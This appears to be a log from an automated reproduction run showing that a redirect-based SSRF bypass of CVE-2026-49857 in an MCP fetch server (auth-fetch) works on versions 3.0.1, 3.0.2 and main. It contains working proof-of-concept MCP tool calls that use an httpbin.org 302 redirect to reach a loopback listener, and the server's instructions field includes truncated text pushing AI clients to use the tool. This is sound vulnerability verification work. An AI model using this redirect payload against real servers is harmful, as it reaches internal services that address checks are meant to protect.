=== CVE-2026-49857 VARIANT (redirect SSRF bypass) === Date: Thu Jul 2 18:15:55 UTC 2026 ROOT: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle CACHE_REPO: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/repo BROWSER_CACHE: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers REDIRECTOR: http://httpbin.org/redirect-to?url=http%3A%2F%2F127.0.0.1%3A18080%2F&status_code=302 Checking httpbin.org reachability... httpbin redirect HTTP 302 wt-vuln HEAD: 98f381d1298b6b7e7ff29d7a7851f18ea5f2364c (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-vuln/dist/index.js) wt-fixed HEAD: d4dedaf55c1d39228dbed58807ea1f9fac1328e1 (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-fixed/dist/index.js) wt-main HEAD: a4b92452dc9332fb4063225f3d8842f3602a54a3 (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-main/dist/index.js) ══════════════════════════════════════════════════ Variant probe: vuln-variant (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-vuln/dist/index.js) ══════════════════════════════════════════════════ [VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783016156529_z6l52j5m [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.1"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] 
{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:15:57.715Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-vuln-variant/.auth-fetch-mcp/downloads/2026-07-02T18-15-57\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-local *** REDIRECT BYPASS CONFIRMED [vuln-variant]: control blocked, variant reached loopback via redirect *** vuln-variant RESULT: ssrfConfirmed=true controlBlocked=true variantSsrf=true ══════════════════════════════════════════════════ Variant probe: fixed-variant (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-fixed/dist/index.js) ══════════════════════════════════════════════════ [VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783016158440_ej1vxnj9 [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] 
{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:16:01.006Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-fixed-variant/.auth-fetch-mcp/downloads/2026-07-02T18-15-59\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-loca *** REDIRECT BYPASS CONFIRMED [fixed-variant]: control blocked, variant reached loopback via redirect *** fixed-variant RESULT: ssrfConfirmed=true controlBlocked=true variantSsrf=true ══════════════════════════════════════════════════ Variant probe: main-variant (dist: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/artifacts/wt-main/dist/index.js) ══════════════════════════════════════════════════ [VICTIM] Listening on 127.0.0.1:18080 marker=VARIANT_SSRF_MARKER_1783016161549_fwu5kx8u [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"variant-ssrf-client","version":"1.0.0"}}} [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially from Notion, Google Docs, Jira, Confluence, Linear, Slack, or any SaaS platform), you MUST use the [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] 
{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://127.0.0.1:18080/direct-control","http://httpbin.org/redirect-to?url=htt [VICTIM:18080] 2026-07-02T18:16:04.338Z Request from 127.0.0.1 path=/ host=127.0.0.1:18080 [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/vuln_variant/mcp-home-main-variant/.auth-fetch-mcp/downloads/2026-07-02T18-16-02\",\"downloaded\":1,\"total\":2,\"files\":[{\"url\":\"http://127.0.0.1:18080/direct-control\",\"error\":\"Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-local *** REDIRECT BYPASS CONFIRMED [main-variant]: control blocked, variant reached loopback via redirect *** main-variant RESULT: ssrfConfirmed=true controlBlocked=true variantSsrf=true ══════════════════════════════════════════════════ SUMMARY (redirect SSRF bypass) ══════════════════════════════════════════════════ Vulnerable v3.0.1: redirect-bypass SSRF = true Fixed v3.0.2: redirect-bypass SSRF = true (controlBlocked=true, variantSsrf=true) Latest main: redirect-bypass SSRF = true VERDICT: BYPASS CONFIRMED on fixed v3.0.2 (and latest main=true). Evidence, identical in all three probes (v3.0.1, v3.0.2, main): the direct control URL http://127.0.0.1:18080/direct-control is rejected with "Refusing to fetch 127.0.0.1 (resolves to private/loopback/link-local ...)", whereas the second URL, which points at the public httpbin.org redirector (HTTP 302 to http://127.0.0.1:18080/), produces a "[VICTIM:18080] Request from 127.0.0.1 path=/ host=127.0.0.1:18080" line on the loopback listener; the tool result's downloaded=1 of total=2 is consistent with that redirected fetch being the one that succeeded. This means the v3.0.2 host/address check is applied only to the URL the caller supplies, not to the Location target the HTTP client follows. A complete fix must stop following redirects automatically and re-run the private/loopback/link-local check (after resolving that hop's hostname) on every redirect target before requesting it, or refuse cross-host redirects outright; a fix that still lets the client follow 3xx responses on its own will keep failing this probe. Caveat: the tool response is truncated in this excerpt, so the marker (VARIANT_SSRF_MARKER_…) round-trip is not visible here; the proof of reach is the listener's request log line, not returned content.